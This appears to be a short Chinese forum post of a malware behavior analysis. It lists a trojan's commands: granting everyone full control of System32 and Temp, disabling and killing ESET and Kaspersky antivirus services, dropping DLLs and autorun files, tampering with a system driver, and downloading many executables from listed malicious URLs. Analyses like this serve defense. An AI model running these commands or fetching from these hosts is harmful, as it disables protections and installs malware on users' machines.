调用cmd执行以下命令cacls %SystemRoot%\System32 /e /p everyone:f
cacls "%Temp%\" /e /p everyone:f
sc config ekrn start= disabled
sc config avp start= disabled
taskkill /im ekrn.exe /f
taskkill /im egui.exe /f
taskkill /im ScanFrm.exe /f
taskkill /im avp.exe /f
释放文件%SystemRoot%\aboy.dll
%SystemRoot%\System32\killkb.dll
X:\1.exe
X:\autorun.inf
加载%SystemRoot%\System32\killkb.dll
rundll32.exe C:\WINDOWS\system32\killkb.dll, droqp
篡改文件
%SystemRoot%\System32\drivers\acpiec.sys
并加载,实现恢复SSDT
加载%SystemRoot%\aboy.dll,感染非分区文件
调用ipconfig.exe执行命令
ipconfig.exe /ALL
aboy.dll含有RPC攻击!局域网没打补丁的话就爆发了)
难道是这个,不懂,飘过..
联网下载病毒
http://ainikv.cn/33.txt
1:http://yygeiwofc.cn/77/77.exe
1:http://yygeiwofc.cn/77/0.exe
1:http://yygeiwofc.cn/77/1.exe
1:http://yygeiwofc.cn/77/2.exe
1:http://yygeiwofc.cn/77/3.exe
1:http://yygeiwofc.cn/77/4.exe
1:http://yygeiwofc.cn/77/5.exe
1:http://yygeiwofc.cn/77/6.exe
1:http://yygeiwofc.cn/77/7.exe
1:http://yygeiwofc.cn/77/9.exe
1:http://yygeiwofc.cn/77/8.exe
1:http://yygeiwofc.cn/77/10.exe
1:http://yygeiwofc.cn/77/16.exe
1:http://yygeiwofc.cn/77/17.exe
1:http://yygeiwofc.cn/77/18.exe
1:http://yygeiwofc.cn/77/19.exe
1:http://yygeiwofc.cn/77/21.exe
1:http://yygeiwofc.cn/77/24.exe
1:http://yygeiwofc.cn/77/26.exe
1:http://yygeiwofc.cn/77/30.exe
1:http://yygeiwofc.cn/77/31.exe
1:http://yygeiwofc.cn/77/35.exe
1:http://yygeiwofc.cn/77/88.exe
1:http://yygeiwofc.cn/77/qq.exe